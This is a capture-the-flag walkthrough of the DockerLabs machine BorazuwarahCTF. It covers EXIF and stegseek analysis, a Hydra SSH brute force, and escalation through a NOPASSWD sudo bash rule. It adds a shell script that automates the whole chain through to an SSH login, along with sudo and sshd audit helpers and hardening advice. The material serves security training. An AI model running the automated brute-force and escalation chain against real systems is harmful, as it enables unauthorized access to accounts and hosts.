BorazuwarahCTF is a Very Easy DockerLabs machine that chains three distinct techniques into a clean learning path: steganography to extract a hidden username from an image, Hydra to brute-force SSH credentials, and a dangerously misconfigured sudo rule to escalate directly to root. It is an ideal machine for practising OSINT-style image analysis alongside classic credential attacks.
Machine Info
| Field | Details |
|---|---|
| Difficulty | Very Easy (Muy Fácil) |
| Category | Infrastructure Hacking (Hacking Infraestructura) |
| OS | Linux |
| Key Techniques | Steganography, SSH brute force, sudo privilege escalation |
| Default Target IP | 172.17.0.2 |
Phase 0: Launch Kali Portable
Open a second terminal window and start your Kali Portable environment before doing anything else.
Phase 1: Deploy the Machine
Download borazuwarahCTF.zip from DockerLabs, then unzip it and run the bundled deploy script in your first terminal. Once the container is up, the target is reachable at 172.17.0.2.
Phase 2: Reconnaissance
Verify Connectivity
Before scanning, confirm the container is alive with a quick ping. You should see replies with very low latency, since you are on the same Docker bridge network as the container.
Nmap Service Scan
Run a version and default-script scan at an accelerated rate (acceptable in this controlled environment, noisy anywhere else):
| Argument | Meaning |
|---|---|
| -sC | Runs the default NSE scripts for common checks |
| -sV | Detects service versions |
| --min-rate 2000 | Sends at least 2000 packets per second; fast but noisy |
Findings:
| Port | Service | Version |
|---|---|---|
| 22/tcp | SSH | OpenSSH 9.2p1 |
| 80/tcp | HTTP | Apache |
Phase 3: Web Enumeration
Navigate to http://172.17.0.2 in a browser. The page displays a single image, a Kinder Surprise egg (huevito.jpeg), with no navigation or login form.
Run Gobuster against the web root to check for hidden paths before turning to the image itself.
Phase 4: Steganography — Extracting the Hidden Username
This is the core phase of the machine. The image carries hidden data that is recovered through two complementary methods.
Metadata Analysis with Exiftool
Download huevito.jpeg and check its metadata with exiftool, a frequently overlooked source of information.
Key finding: the Description field (or a similar metadata field) contains the username borazuwarah. This is the account name needed for the brute force in the next phase.
Steghide Extraction with Stegseek
Stegseek is a high-speed steghide cracker that runs through the whole rockyou wordlist in seconds. Running it against huevito.jpeg recovers the steghide passphrase and extracts the embedded file (written as huevito.jpeg.out unless you pass -xf). Its content does not reveal directly useful credentials, but it confirms that the image was used as a steganographic container.
Results so far:
- Username: borazuwarah (from EXIF metadata)
- Confirmed steganographic content inside huevito.jpeg
Phase 5: SSH Brute Force with Hydra
Armed with the username, use Hydra to brute-force the SSH password against rockyou.txt.
| Argument | Meaning |
|---|---|
| -l borazuwarah | Single known username |
| -P rockyou.txt | Password wordlist |
| ssh://172.17.0.2 | Target protocol and IP |
| -t 64 | 64 parallel tasks. Hydra itself warns that SSH servers throttle parallel logins (sshd's MaxStartups) and recommends -t 4; if a run misses the password, lower the task count |
Hydra recovers the password quickly: it sits near the top of rockyou.txt.
As an experiment, you can also run Nmap's built-in ssh-brute NSE script for comparison. In this low-latency Docker environment it can finish as fast as or faster than Hydra. On real networks with latency, lockouts and rate limiting, Hydra's tunable task count, retries and resumable sessions make it the more reliable and configurable choice.
Phase 6: SSH Access
Connect over SSH with the recovered credentials (ssh borazuwarah@172.17.0.2). You now have a shell as the borazuwarah user.
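The whole chain from Phase 2 to this point, as one script. This is an added example and not the original write-up's commands: it assumes the Kali default wordlist paths, that nmap, gobuster, curl, exiftool, stegseek, hydra and sshpass are installed, that the first <img src> on the index page is the egg image, and that the username sits in a Description (or ImageDescription) tag. The two parsers it relies on (open_ports for nmap grepable output, exif_field for exiftool -s output) are exercised against constructed samples embedded in the script, so nothing touches the network unless you invoke it with run.

```bash
#!/bin/sh
# Added example, not the original write-up's code: Phases 2-6 of BorazuwarahCTF as one
# script. Assumed (not on the page): wordlist paths, that nmap, gobuster, curl, exiftool,
# stegseek, hydra and sshpass are installed, and that the index page's first <img src> is the egg.
set -eu

TARGET="${TARGET:-172.17.0.2}"
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"
DIRLIST="${DIRLIST:-/usr/share/wordlists/dirb/common.txt}"
WORK="${WORK:-./borazuwarah}"

# Constructed samples so the two parsers below can be checked without a live target.
SAMPLE_GNMAP=$(printf 'Host: 172.17.0.2 ()\tPorts: 22/open/tcp//ssh//OpenSSH 9.2p1 (protocol 2.0)/, 80/open/tcp//http//Apache httpd/\tIgnored State: closed (998)')
SAMPLE_EXIF='FileName                        : huevito.jpeg
MIMEType                        : image/jpeg
Description                     : borazuwarah'

# open_ports: nmap -oG output on stdin -> "port/proto service version" per open port.
# Grepable fields are slash-separated: port/state/proto/owner/service/rpcinfo/version.
open_ports() {
  grep '^Host:.*Ports:' | sed 's/.*Ports: //' | tr ',' '\n' | sed 's/^ *//' \
    | awk -F/ '$2 == "open" { printf "%s/%s %s %s\n", $1, $3, $5, $7 }'
}

# exif_field TAG: value of one tag from `exiftool -s` output on stdin (empty if absent).
exif_field() {
  awk -v tag="$1" '$1 == tag { sub(/^[^:]*: /, ""); print; exit }'
}

step_alive() { ping -c 3 -W 2 "$TARGET" >/dev/null && echo "[+] $TARGET answers ICMP"; }

step_scan() {
  # -sC default scripts, -sV versions; --min-rate 2000 is noisy but fine on a lab bridge.
  nmap -sC -sV --min-rate 2000 -oN "$WORK/nmap.txt" -oG "$WORK/nmap.gnmap" "$TARGET" >/dev/null
  open_ports < "$WORK/nmap.gnmap"
}

step_web() {
  gobuster dir -u "http://$TARGET/" -w "$DIRLIST" -q -o "$WORK/gobuster.txt" >/dev/null || true
  # The index is a single <img>; fetch whatever it points at (assumed relative path).
  src=$(curl -fsS "http://$TARGET/" | grep -o 'src="[^"]*"' | head -n 1 | cut -d'"' -f2)
  IMG="$WORK/$(basename "$src")"
  curl -fsS -o "$IMG" "http://$TARGET/${src#/}"
}

step_stego() {
  exiftool -s "$IMG" > "$WORK/exif.txt"
  USER_NAME=$(exif_field Description < "$WORK/exif.txt")
  [ -n "$USER_NAME" ] || USER_NAME=$(exif_field ImageDescription < "$WORK/exif.txt")
  echo "[+] username from metadata: ${USER_NAME:?no Description tag found}"
  # Cracks the steghide passphrase; payload goes to stego.out (default would be $IMG.out).
  stegseek -q -sf "$IMG" -wl "$WORDLIST" -xf "$WORK/stego.out" || true
}

step_brute() {
  # -t 4, not 64: sshd's MaxStartups throttles parallel handshakes and guesses get dropped.
  hydra -l "$USER_NAME" -P "$WORDLIST" -t 4 -f -o "$WORK/hydra.txt" "ssh://$TARGET" >/dev/null
  PASSWORD=$(awk '{ for (i = 1; i <= NF; i++) if ($i == "password:") print $(i + 1) }' "$WORK/hydra.txt")
  echo "[+] hydra: $USER_NAME:$PASSWORD"
}

step_shell() {
  # Land on the box and go straight to the sudo check that Phase 7 explains.
  sshpass -p "$PASSWORD" ssh -o StrictHostKeyChecking=no "$USER_NAME@$TARGET" 'id; sudo -l'
}

main() {
  mkdir -p "$WORK"
  step_alive && step_scan && step_web && step_stego && step_brute && step_shell
}

# Only touch the network when invoked as `sh chain.sh run`; sourcing the file exposes the helpers.
if [ "${1:-}" = "run" ]; then main; fi
```

Run it with TARGET=172.17.0.2 sh chain.sh run. The Hydra task count is 4 rather than the 64 used above on purpose: with more parallel handshakes than sshd's MaxStartups allows, connections are dropped and guesses silently go missing, which is the usual reason a brute force "fails" against a password that is in the list.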
Phase 7: Privilege Escalation via Sudo
Enumerate Sudo Permissions
Check what commands the current user can run with sudo (sudo -l). The output shows that borazuwarah may run /bin/bash as any user, including root, with the NOPASSWD tag. This is an extremely dangerous misconfiguration: sudo /bin/bash drops straight into a root shell with no password prompt.
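An added example, not from the original write-up, that turns the Phase 7 check into something repeatable: a small parser for sudo -l output that flags root-equivalent rules (a shell binary, ALL as the command, or NOPASSWD on anything), followed by the escalation itself and the least-privilege rule that should have been there instead. All three sudo -l samples are constructed; the sample modelled on this machine uses the rule described above, and the hostname boraz and the systemctl command in the other samples are made up.

```bash
#!/bin/sh
# Added example, not from the original write-up: parse `sudo -l` output for root-equivalent
# rules, then the escalation the page describes and the rule that should replace it.
# All three sudo -l samples are constructed; hostname "boraz" and the systemctl command are made up.
set -eu

# Modelled on the rule the write-up describes: bash as any user, no password.
SAMPLE_SUDO_L='Matching Defaults entries for borazuwarah on boraz:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User borazuwarah may run the following commands on boraz:
    (ALL) NOPASSWD: /bin/bash'

# The classic admin-style grant, equally fatal.
SAMPLE_SUDO_L_ALL='User borazuwarah may run the following commands on boraz:
    (ALL : ALL) ALL'

# What least privilege looks like: one specific, non-interactive command, password still required.
SAMPLE_SUDO_L_HARDENED='User borazuwarah may run the following commands on boraz:
    (root) /usr/bin/systemctl restart apache2'

# audit_sudo_l: `sudo -l` output on stdin -> one finding per dangerous rule, nothing if clean.
# Rule lines are the indented "(runas) [TAG:] cmd, cmd" lines after the "may run" header.
audit_sudo_l() {
  awk '
    /may run the following commands/ { in_rules = 1; next }
    in_rules && /^[ \t]+\(/ {
      line = $0; sub(/^[ \t]+/, "", line)
      runas = line; sub(/\).*/, "", runas); sub(/^\(/, "", runas)
      cmds = line; sub(/^\([^)]*\)[ \t]*/, "", cmds)
      nopasswd = (cmds ~ /NOPASSWD:/)
      sub(/^([A-Z]+:[ \t]*)+/, "", cmds)            # strip tags such as NOPASSWD: SETENV:
      n = split(cmds, parts, /,[ \t]*/)
      for (i = 1; i <= n; i++) {
        cmd = parts[i]; sub(/[ \t].*/, "", cmd)      # keep the binary, drop its arguments
        base = cmd; sub(/.*\//, "", base)
        sev = ""
        if (cmd == "ALL") sev = "CRITICAL: unrestricted ALL"
        else if (base ~ /^(bash|sh|dash|zsh|ksh|fish|csh|tcsh)$/) sev = "CRITICAL: shell binary " cmd
        else if (nopasswd) sev = "WARNING: NOPASSWD on " cmd
        if (sev != "") printf "%s (runas %s%s)\n", sev, runas, (nopasswd ? ", no password" : "")
      }
    }'
}

# On the target (not run here):
#   sudo -l | audit_sudo_l    # -> CRITICAL: shell binary /bin/bash (runas ALL, no password)
#   sudo /bin/bash            # root shell, no password prompt
#   id                        # uid=0(root) ...
# Fix, via visudo into /etc/sudoers.d/borazuwarah (illustrative command, not from the page):
#   borazuwarah ALL=(root) /usr/bin/systemctl restart apache2
```

The parser only sees what sudo -l prints for the current user, so it is a post-exploitation and self-audit aid, not a replacement for reviewing /etc/sudoers and /etc/sudoers.d as root. Note that a rule granting a pager, an editor or find without NOPASSWD would pass this check while still being root-equivalent; extend the shell list with whatever interactive programs your hosts carry.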
Post-Lab Cleanup
When you are done, return to your deploy terminal and press Ctrl+C to stop and remove the Docker container. Then type exit to leave the Kali Portable session.
Key Takeaways
Steganography as an Attack Vector
Image metadata (EXIF fields) can expose usernames, emails, or GPS coordinates. Always inspect files thoroughly with exiftool and stegseek before moving on.
Weak Passwords Are the Problem
The password found here is near the top of rockyou.txt. A strong, unique password would have stopped Hydra in its tracks. Password policies matter.
sudo /bin/bash = Root Access
Granting sudo access to a shell binary (bash, sh, zsh), or to any program that can spawn one (editors, pagers, find, awk and the like), is equivalent to giving full root access. Use sudo only for specific, non-interactive commands, and keep the password requirement unless there is a strong reason to drop it.
SSH Hardening
Implement fail2ban to block brute-force attempts and disable password authentication in favour of SSH keys. Changing the default port reduces automated scanning noise in the logs, but it is not a security control: a targeted attacker finds the new port in a single nmap run.
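For the SSH hardening item, an added example that is not part of the original write-up: an audit function that reads an sshd_config and reports the settings that made the Hydra attack above possible, applying sshd's first-match-wins rule and its compiled-in defaults, next to a hardened drop-in and a fail2ban jail. Both sshd_config samples and the jail are constructed; the file paths in the comments are the Debian defaults.

```bash
#!/bin/sh
# Added example, not from the original write-up: audit an sshd_config for the settings
# that let the Hydra run succeed, and show the hardened values. The two config samples
# and the fail2ban jail are constructed; the paths in comments are Debian defaults.
set -eu

# Constructed: what the target's config effectively looks like (password logins allowed,
# everything else left at the compiled-in default).
SAMPLE_WEAK_SSHD='Port 22
#PermitRootLogin prohibit-password
PasswordAuthentication yes
#MaxAuthTries 6
KbdInteractiveAuthentication yes
UsePAM yes'

# Hardened drop-in for /etc/ssh/sshd_config.d/10-hardening.conf (check with `sshd -t`, then reload).
HARDENED_SSHD='PasswordAuthentication no
KbdInteractiveAuthentication no
PubkeyAuthentication yes
PermitRootLogin no
MaxAuthTries 3
LoginGraceTime 20
AllowUsers borazuwarah'

# Constructed: /etc/fail2ban/jail.d/sshd.local. Five failures within 10 minutes bans the
# source for an hour; a Hydra run at any realistic task count trips it within seconds.
FAIL2BAN_JAIL='[sshd]
enabled  = true
port     = ssh
maxretry = 5
findtime = 10m
bantime  = 1h'

# sshd_effective KEY DEFAULT: the value sshd will use for KEY from the config on stdin.
# sshd takes the first uncommented occurrence; if there is none, the compiled-in DEFAULT applies.
# Keys are compared case-insensitively so `sshd -T` output (all lowercase) works as input too.
sshd_effective() {
  val=$(awk -v k="$1" 'tolower($1) == tolower(k) { print $2; exit }')
  printf '%s\n' "${val:-$2}"
}

# check_setting KEY WANT DEFAULT WHY: print one WEAK line if $CFG does not yield WANT for KEY.
check_setting() {
  got=$(printf '%s\n' "$CFG" | sshd_effective "$1" "$3")
  [ "$got" = "$2" ] || printf 'WEAK: %s is %s, want %s (%s)\n' "$1" "$got" "$2" "$4"
}

# audit_sshd: sshd_config on stdin -> one line per weak setting, nothing if all is well.
audit_sshd() {
  CFG=$(cat)
  check_setting PasswordAuthentication no yes "passwords are what Hydra guesses; use keys"
  check_setting KbdInteractiveAuthentication no yes "PAM keyboard-interactive still accepts a password"
  check_setting PermitRootLogin no prohibit-password "root should never be a remote login target"
  check_setting MaxAuthTries 3 6 "fewer guesses per connection before sshd disconnects"
}

# On a host (as root, so Include files are resolved): sshd -T | audit_sshd
# Offline: printf '%s\n' "$SAMPLE_WEAK_SSHD" | audit_sshd   # four WEAK lines
#          printf '%s\n' "$HARDENED_SSHD"    | audit_sshd   # no output
```

Feed it sshd -T rather than the raw file when you can: that prints the effective configuration after all Include directives, which is what the daemon actually enforces. Apply the hardened drop-in with a second session already open, run sshd -t before reloading, and remember that KbdInteractiveAuthentication must go off together with PasswordAuthentication, or PAM keeps taking passwords through the back door.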